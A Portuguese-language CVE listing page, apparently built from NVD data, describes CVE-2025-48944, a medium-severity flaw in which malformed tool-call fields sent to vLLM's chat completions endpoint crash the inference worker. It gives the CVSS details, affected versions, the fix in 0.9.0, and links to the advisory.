← Voltar para CVEs
CVE-2025-48944
MEDIUM6.5
Descricao
vLLM is an inference and serving engine for large language models (LLMs). In version 0.8.0 up to but excluding 0.9.0, the vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. Version 0.9.0 fixes the issue.
Detalhes CVE
Pontuacao CVSS v3.16.5
SeveridadeMEDIUM
Vetor CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Vetor de ataqueNETWORK
ComplexidadeLOW
Privilegios necessariosLOW
Interacao do usuarioNONE
Publicado5/30/2025
Ultima modificacao7/1/2025
Fontenvd
Avistamentos honeypot0
Produtos afetados
vllm:vllm
Fraquezas (CWE)
CWE-20
Referencias
https://github.com/vllm-project/vllm/pull/17623(security-advisories@github.com)
https://github.com/vllm-project/vllm/security/advisories/GHSA-vrq3-r879-7m65(security-advisories@github.com)
Correlacoes IOC
Sem correlacoes registradas
This product uses data from the NVD API but is not endorsed or certified by the NVD.